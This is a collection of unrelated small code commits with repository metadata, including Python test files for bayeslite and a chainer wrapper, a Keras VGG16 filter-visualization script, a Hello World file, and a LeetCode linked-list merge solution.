e3b7b9e5f8ca1be061c71c764fd62d6aeed3fd43 | Add test suite for bqlmath. | probcomp/bayeslite,probcomp/bayeslite | tests/test_bqlmath.py | tests/test_bqlmath.py | # -*- coding: utf-8 -*-
# Copyright (c) 2010-2016, MIT Probabilistic Computing Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import itertools
import apsw
import pytest
from bayeslite import bayesdb_open
from bayeslite import bqlmath
from bayeslite.math_util import abserr
from bayeslite.util import cursor_value
def get_python_math_call(name, probe):
func = bqlmath.bqlmath_funcs[name]
if isinstance(probe, tuple):
return func(*probe)
else:
return func(probe)
def get_sql_math_call(name, probe):
if isinstance(probe, tuple):
return 'SELECT %s%s' % (name, str(probe))
else:
return 'SELECT %s(%s)' % (name, probe)
PROBES_FLOAT = [-2.5, -1, -0.1, 0, 0.1, 1, 2.5]
PROBES_TUPLE = itertools.combinations(PROBES_FLOAT, 2)
PROBES = itertools.chain(PROBES_FLOAT, PROBES_TUPLE)
FUNCS = bqlmath.bqlmath_funcs.iterkeys()
@pytest.mark.parametrize('name,probe', itertools.product(FUNCS, PROBES))
def test_math_func_one_param(name, probe):
# Retrieve result from python.
python_value_error = None
python_type_error = None
try:
result_python = get_python_math_call(name, probe)
except ValueError:
python_value_error = True
except TypeError:
python_type_error = True
# Retrieve result from SQL.
sql_value_error = None
sql_type_error = None
try:
with bayesdb_open(':memory') as bdb:
cursor = bdb.execute(get_sql_math_call(name, probe))
result_sql = cursor_value(cursor)
except ValueError:
sql_value_error = True
except (TypeError, apsw.SQLError):
sql_type_error = True
# Domain error on both.
if python_value_error or sql_value_error:
assert python_value_error and sql_value_error
# Arity error on both.
elif python_type_error or sql_type_error:
assert python_type_error and sql_type_error
# Both invocations succeeded, confirm results match.
else:
assert abserr(result_python, result_sql) < 1e-4
| apache-2.0 | Python |
|
2014f326eb73f7b30fe9cad8f30df80e7b8b3f26 | add first test | aweimeow/PyCat | tests/test_ipcheck.py | tests/test_ipcheck.py | class TestBoundaryValue:
def test_WeakNomral(self):
pass
| mit | Python |
|
d95a7d6017dd6a08d9c8df5af9c61ee2cb23d217 | add test code for wrapper.py | yasfmy/chainer_attention_model | tests/test_wrapper.py | tests/test_wrapper.py | import sys
sys.path.append('..')
import unittest
from wrapper import xp
from chainer import cuda
from chainer import Variable
class WrapperTestCase(unittest.TestCase):
def test_xp(self):
try:
cuda.check_cuda_available()
module = 'cupy'
except:
module = 'numpy'
self.assertEqual(xp.__name__, module)
def test_Zeros(self):
zeros = xp.Zeros((1, 1), dtype=xp.float32)
self.assertEqual(type(zeros), Variable)
self.assertEqual(zeros.data[0][0], 0.0)
self.assertEqual(zeros.data.dtype, xp.float32)
def test_Array(self):
arr = xp.Array([0], dtype=xp.int32)
self.assertEqual(type(arr), Variable)
self.assertEqual(arr.data[0], 0)
self.assertEqual(arr.data.dtype, xp.int32)
| mit | Python |
|
c9a1f5416e62a0d5311a9e692c08ad0fe49b9b18 | Add visualize_vgg16.py | aidiary/keras_examples,aidiary/keras_examples | dream/visualize_vgg16.py | dream/visualize_vgg16.py | from keras.applications.vgg16 import VGG16
from keras.layers import Input
from keras import backend as K
import numpy as np
import matplotlib.pyplot as plt
img_width, img_height, num_channels = 224, 224, 3
input_tensor = Input(shape=(img_height, img_width, num_channels))
model = VGG16(include_top=True, weights='imagenet', input_tensor=input_tensor)
layer_dict = dict([(layer.name, layer) for layer in model.layers])
model.summary()
def deprocess_image(x):
# テンソルを平均0、標準偏差0.1になるように正規化
x -= x.mean()
x /= (x.std() + 1e-5)
x *= 0.1
# [0, 1]にクリッピング
x += 0.5
x = np.clip(x, 0, 1)
# RGBに変換
x *= 255
x = np.clip(x, 0, 255).astype('uint8')
return x
def visualize_filter(layer_name, filter_index):
if layer_name not in layer_dict:
print("ERROR: invalid layer name: %s" % layer_name)
return
# 指定した層
layer = layer_dict[layer_name]
# layer.output_shape[-1]はどの層でもフィルタ数にあたる(tfの場合)
# predictions層の場合はクラス数になる
if not (0 <= filter_index < layer.output_shape[-1]):
print("ERROR: invalid filter index: %d" % filter_index)
return
# 指定した層の指定したフィルタの出力の平均を損失とする
# 実際は、層の出力を最大化したいため損失は負の記号をつける
if layer_name == 'predictions':
loss = - K.mean(layer.output[:, filter_index])
else:
loss = - K.mean(layer.output[:, :, :, filter_index])
# 層の出力の入力画像に対する勾配を求める
# 入力画像を微小量変化させたときの出力の変化量を意味する
grads = K.gradients(loss, input_tensor)[0]
# 正規化トリック
# 画像に勾配を足し込んだときにちょうどよい値になる
grads /= (K.sqrt(K.mean(K.square(grads))) + K.epsilon())
# 画像を入力して損失と勾配を返す関数を定義
iterate = K.function([input_tensor], [loss, grads])
# ノイズを含んだ画像(4Dテンソル)から開始する
x = np.random.random((1, img_height, img_width, 3))
x = (x - 0.5) * 20 + 128
# 初期画像を描画
img = deprocess_image(x[0])
plt.imshow(img)
plt.show()
if __name__ == '__main__':
visualize_filter('block1_conv1', 0)
visualize_filter('block5_conv3', 501)
visualize_filter('predictions', 64)
| mit | Python |
|
6733cc00015458c307272a3124857bf686b06fbb | Create h.py | samazgor/samazgor.github.com,samazgor/samazgor.github.com,samazgor/samazgor.github.com,samazgor/samazgor.github.com | h.py | h.py | print "Hello, World!"
| apache-2.0 | Python |
|
553009b8f0cb0396f266d10dc5b6010ad60e7a25 | Solve task #21 | Zmiecer/leetcode,Zmiecer/leetcode | 21.py | 21.py | # Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution(object):
def mergeTwoLists(self, l1, l2):
"""
:type l1: ListNode
:type l2: ListNode
:rtype: ListNode
"""
def step(l, y):
x = ListNode(l.val)
y.next = x
y = y.next
l = l.next
return [l, y]
if not l1 or not l2:
return l1 or l2
x = y = ListNode(0)
while (l1 is not None) and (l2 is not None):
if l1.val < l2.val:
l1, y = step(l1, y)
else:
l2, y = step(l2, y)
if l1 is None:
y.next = l2
else:
y.next = l1
return x.next
| mit | Python |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.